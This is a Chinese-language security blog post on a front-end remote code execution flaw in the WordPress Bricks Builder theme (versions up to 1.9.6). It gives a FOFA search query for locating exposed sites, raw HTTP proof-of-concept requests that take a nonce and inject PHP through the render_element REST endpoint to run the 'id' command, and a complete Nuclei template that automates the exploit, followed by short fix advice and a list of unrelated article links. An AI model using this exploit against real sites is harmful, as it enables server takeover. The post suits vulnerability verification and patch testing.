当前位置：首页 > news >正文

WordPres Bricks Builder 前台RCE漏洞

news 2026/3/30 4:43:53

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

Bricks Builder是一款用于WordPress的开发主题，提供直观的拖放界面，用于设计和构建WordPress网站。它使用户能够轻松创建自定义的网页布局和设计，无需编写或了解复杂的代码。Bricks Builder具有用户友好的界面和强大的功能，使用户可以通过简单的拖放操作添加、编辑和排列各种网页元素，例如文本框、图像、按钮、导航菜单等。它为WordPress用户提供了一种直观且便捷的方式来构建专业和吸引人的网站，无论是个人博客、商业网站还是电子商务平台。

由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。

影響版本

Brick Builder 主题在低于<= 1.9.6

Ⅱ、fofa语句

body="/wp-content/themes/bricks/"

Ⅲ、漏洞复现

POC-1

GET / HTTP/1.1
Host: 127.0.0.1

POC-2

POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: */*
Content-Type: application/json{"postId": "1","nonce": "dc50d26123","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}
}

1、构建 POC，获取nonce值

2、使用第一步获取的nonce值构造数据包，执行RCE

Ⅳ、Nuclei-POC

id: WordPres-Bricks-Builder-RCEinfo:name: 由於函數"prepare_query_vars_from_settings "中的一个 eval 函数错误调用，導致遠程代碼執行漏洞，惡意攻擊者可能會利用此漏洞執行惡意代碼，從而獲取服務器權限。author: WLFseverity: highmetadata: fofa-query: body="/wp-content/themes/bricks/"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET / HTTP/1.1Host: {{Hostname}}- |POST /wp-json/bricks/v1/render_element HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: */*Content-Type: application/json{"postId": "1","nonce": "{{path}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "throw new Exception(`id`);","objectType": "post"}}}}extractors:- type: regexname: pathgroup: 1regex:- '"nonce":"(\w*)"'internal: truematchers:- type: dsldsl:- status_code==200 && contains_all(body,"Exception","gid=","uid=")

Ⅴ、修复建议

1、关闭互联网暴露面或接口设置访问权限

2、部署WAF对站点路径进行防护

3、将Bricks Builder组件升级只安全版本

WordPres Bricks Builder 前台RCE漏洞

相关文章：

WordPres Bricks Builder 前台RCE漏洞

渗透测试—信息收集

安卓adb调试备忘录

【软件架构】01-架构的概述

Vue 图片轮播第三方库介绍

设置主从复制时发生报错Could not find first log file name in binary log index file‘；解决方案

React Context的使用方法

ElasticSearch索引数据备份与恢复

kubernetes日志收集 fluent-operator 动态索引名的实现

pip换源

7.（数据结构）堆

AWS Elastic Beanstalk通过应用负载均衡配置https

AC自动机：文本搜索的加速器

备战蓝桥杯---基础算法刷题1

探索 Flutter 中的动画：使用 flutter_animate

装机容量对光伏发电量的影响有多大？如何通过装机容量计算发电量？

软考37-上午题-【数据库】-数据模型、数据库的三级模式和二级映像

06 分频器设计

力扣hot100题解（python版7-9题）

ECMAScript 6+ 新特性 ( 四 ) 迭代器与生成器

深度学习模型的绿色优化：Torch-Pruning减少能源消耗的终极指南

从逆向工程到实战：深度解析钉钉本地数据取证与加密对抗

MAG3110磁力计驱动开发与地磁导航嵌入式实践

如何为Windows任务栏添加现代圆角设计：RoundedTB完全配置指南

三轴 MEMS 加速度传感器在工业预测性维护中的关键应用

51：L构建容器与Kubernetes安全：蓝队的容器防御

CentOS 7 无线网卡“失踪”排查指南：从驱动到NetworkManager的全面诊断

GoAccess源码深度解析：从main函数到核心模块调用链的完整指南

【限时解密】某汽车Tier1工厂拒绝公开的Python网关冗余切换配置——双网口+心跳检测+自动故障转移（含Wireshark抓包验证截图）

比迪丽LoRA模型Ubuntu部署教程：3步完成环境配置与启动